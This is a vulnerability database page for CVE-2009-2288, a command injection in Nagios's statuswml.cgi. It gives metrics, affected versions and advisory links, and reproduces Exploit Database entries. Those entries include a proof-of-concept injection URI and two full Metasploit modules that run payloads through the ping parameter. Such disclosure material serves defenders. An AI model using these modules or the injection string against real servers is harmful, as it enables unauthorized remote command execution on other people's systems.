CVE-2009-2288 : Detail

CVE-2009-2288

OS Command Injection
A03-Injection
96.57%V3
Network
2009-07-01
10h26 +00:00
2009-07-10
07h00 +00:00
Notifications for a CVE
Stay informed of any changes for a specific CVE.
Notifications manage

CVE Descriptions

statuswml.cgi in Nagios before 3.1.1 allows remote attackers to execute arbitrary commands via shell metacharacters in the (1) ping or (2) Traceroute parameters.

CVE Informations

Related Weaknesses

CWE-ID Weakness Name Source
CWE-78 Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')
The product constructs all or part of an OS command using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the intended OS command when it is sent to a downstream component.

Metrics

Metrics Score Severity CVSS Vector Source
V2 7.5 AV:N/AC:L/Au:N/C:P/I:P/A:P nvd@nist.gov

EPSS

EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.

EPSS Score

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

EPSS Percentile

The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.

Exploit information

Exploit Database EDB-ID : 33051

Publication date : 2009-05-21 22h00 +00:00
Author : Paul
EDB Verified : Yes

source: https://www.securityfocus.com/bid/35464/info Nagios is prone to a remote command-injection vulnerability because it fails to adequately sanitize user-supplied input data. Remote attackers can exploit this issue to execute arbitrary shell commands with the privileges of the user running the application. NOTE: For an exploit to succeed, access to the WAP interface's ping feature must be allowed. Versions prior to Nagios 3.1.1 are vulnerable. The following example URI is available: https://www.example.com/nagios/cgi-bin/statuswml.cgi?ping=173.45.235.65%3Becho+%24PATH
Exploit Database EDB-ID : 16908

Publication date : 2010-07-13 22h00 +00:00
Author : Metasploit
EDB Verified : Yes

## # $Id: nagios3_statuswml_ping.rb 9829 2010-07-14 18:23:47Z hdm $ ## ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient def initialize(info = {}) super(update_info(info, 'Name' => 'Nagios3 statuswml.cgi Ping Command Execution', 'Description' => %q{ This module abuses a metacharacter injection vulnerability in the Nagios3 statuswml.cgi script. This flaw is triggered when shell metacharacters are present in the parameters to the ping and traceroute commands. }, 'Author' => [ 'hdm' ], 'License' => MSF_LICENSE, 'Version' => '$Revision: 9829 $', 'References' => [ [ 'CVE', '2009-2288' ], [ 'OSVDB', '55281'], ], 'Platform' => ['unix'], 'Arch' => ARCH_CMD, 'Privileged' => false, 'Payload' => { 'Space' => 1024, 'DisableNops' => true, 'BadChars' => '<>', 'Compat' => { 'RequiredCmd' => 'generic perl ruby bash telnet', } }, 'Targets' => [ [ 'Automatic Target', { }] ], 'DefaultTarget' => 0, 'DisclosureDate' => 'Jun 22 2009')) register_options( [ OptString.new('URI', [true, "The full URI path to statuswml.cgi", "/nagios3/cgi-bin/statuswml.cgi"]), OptString.new('USER', [true, "The username to authenticate with", "guest"]), OptString.new('PASS', [true, "The password to authenticate with", "guest"]), ], self.class) end def exploit print_status("Sending request to http://#{rhost}:#{rport}#{datastore['URI']}") res = send_request_cgi({ 'method' => 'POST', 'uri' => datastore['URI'], 'headers' => { 'Authorization' => 'Basic ' + Rex::Text.encode_base64("#{datastore['USER']}:#{datastore['PASS']}") }, 'vars_post' => { 'ping' => ';' + payload.encoded + '&' } }, 10) if(not res) if session_created? print_status("Session created, enjoy!") else print_error("No response from the server") end return end if(res.code == 401) print_error("Please specify correct values for USER and PASS") return end if(res.code == 404) print_error("Please specify the correct path to statuswml.cgi in the URI parameter") return end if(res.body =~ /Invalid host name/) print_error("This server has already been patched") return end if(res.body =~ /p mode='nowrap'>(.*)<\/p>/smi) print_status("Displaying command response") out = $1 print_line(out.gsub(/<b>|<\/b>|<br.>/, '')) return end print_status("Unknown response") end end
Exploit Database EDB-ID : 9861

Publication date : 2009-10-29 23h00 +00:00
Author : H D Moore
EDB Verified : Yes

## # $Id$ ## ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote include Msf::Exploit::Remote::HttpClient def initialize(info = {}) super(update_info(info, 'Name' => 'Nagios3 statuswml.cgi Ping Command Execution', 'Description' => %q{ This module abuses a metacharacter injection vulnerability in the Nagios3 statuswml.cgi script. This flaw is triggered when shell metacharacters are present in the parameters to the ping and traceroute commands. }, 'Author' => [ 'hdm' ], 'License' => MSF_LICENSE, 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2009-2288' ], [ 'OSVDB', '55281'], ], 'Platform' => ['unix'], 'Arch' => ARCH_CMD, 'Privileged' => false, 'Payload' => { 'Space' => 1024, 'DisableNops' => true, 'BadChars' => '<>', 'Compat' => { 'RequiredCmd' => 'generic perl ruby bash telnet', } }, 'Targets' => [ [ 'Automatic Target', { }] ], 'DefaultTarget' => 0)) register_options( [ OptString.new('URI', [true, "The full URI path to statuswml.cgi", "/nagios3/cgi-bin/statuswml.cgi"]), OptString.new('USER', [true, "The username to authenticate with", "guest"]), OptString.new('PASS', [true, "The password to authenticate with", "guest"]), ], self.class) end def exploit print_status("Sending request to http://#{rhost}:#{rport}#{datastore['URI']}") res = send_request_cgi({ 'method' => 'POST', 'uri' => datastore['URI'], 'headers' => { 'Authorization' => 'Basic ' + Rex::Text.encode_base64("#{datastore['USER']}:#{datastore['PASS']}") }, 'vars_post' => { 'ping' => ';' + payload.encoded + '&' } }, 10) if(not res) if session_created? print_status("Session created, enjoy!") else print_error("No response from the server") end return end if(res.code == 401) print_error("Please specify correct values for USER and PASS") return end if(res.code == 404) print_error("Please specify the correct path to statuswml.cgi in the URI parameter") return end if(res.body =~ /Invalid host name/) print_error("This server has already been patched") return end if(res.body =~ /p mode='nowrap'>(.*)<\/p>/smi) print_status("Displaying command response") out = $1 print_line(out.gsub(/<b>|<\/b>|<br.>/, '')) return end print_status("Unknown response, displaying raw HTML") print_line(res.body) end end

Products Mentioned

Configuraton 0

Nagios>>Nagios >> Version To (including) 3.1.0

Nagios>>Nagios >> Version 1.0

    Nagios>>Nagios >> Version 1.0b1

      Nagios>>Nagios >> Version 1.0b2

        Nagios>>Nagios >> Version 1.0b4

          Nagios>>Nagios >> Version 1.1

            Nagios>>Nagios >> Version 1.4.1

              Nagios>>Nagios >> Version 2.0

                Nagios>>Nagios >> Version 2.0b4

                  Nagios>>Nagios >> Version 2.7

                    Nagios>>Nagios >> Version 2.10

                      Nagios>>Nagios >> Version 3.0

                      Nagios>>Nagios >> Version 3.0

                      Nagios>>Nagios >> Version 3.0

                      Nagios>>Nagios >> Version 3.0

                      Nagios>>Nagios >> Version 3.0

                      Nagios>>Nagios >> Version 3.0

                      Nagios>>Nagios >> Version 3.0

                      Nagios>>Nagios >> Version 3.0

                      Nagios>>Nagios >> Version 3.0

                      Nagios>>Nagios >> Version 3.0

                      Nagios>>Nagios >> Version 3.0

                      Nagios>>Nagios >> Version 3.0

                      Nagios>>Nagios >> Version 3.0

                      Nagios>>Nagios >> Version 3.0

                      Nagios>>Nagios >> Version 3.0

                      Nagios>>Nagios >> Version 3.0.1

                      Nagios>>Nagios >> Version 3.0.2

                      Nagios>>Nagios >> Version 3.0.3

                      Nagios>>Nagios >> Version 3.0.4

                      Nagios>>Nagios >> Version 3.0.5

                      Nagios>>Nagios >> Version 3.0.6

                      References

                      http://secunia.com/advisories/35688
                      Tags : third-party-advisory, x_refsource_SECUNIA
                      http://security.gentoo.org/glsa/glsa-200907-15.xml
                      Tags : vendor-advisory, x_refsource_GENTOO
                      http://secunia.com/advisories/35543
                      Tags : third-party-advisory, x_refsource_SECUNIA
                      http://secunia.com/advisories/39227
                      Tags : third-party-advisory, x_refsource_SECUNIA
                      http://marc.info/?l=bugtraq&m=126996888626964&w=2
                      Tags : vendor-advisory, x_refsource_HP
                      http://www.vupen.com/english/advisories/2010/0750
                      Tags : vdb-entry, x_refsource_VUPEN
                      http://secunia.com/advisories/35692
                      Tags : third-party-advisory, x_refsource_SECUNIA
                      http://www.securitytracker.com/id?1022503
                      Tags : vdb-entry, x_refsource_SECTRACK
                      http://www.ubuntu.com/usn/USN-795-1
                      Tags : vendor-advisory, x_refsource_UBUNTU
                      http://marc.info/?l=bugtraq&m=126996888626964&w=2
                      Tags : vendor-advisory, x_refsource_HP
                      http://www.debian.org/security/2009/dsa-1825
                      Tags : vendor-advisory, x_refsource_DEBIAN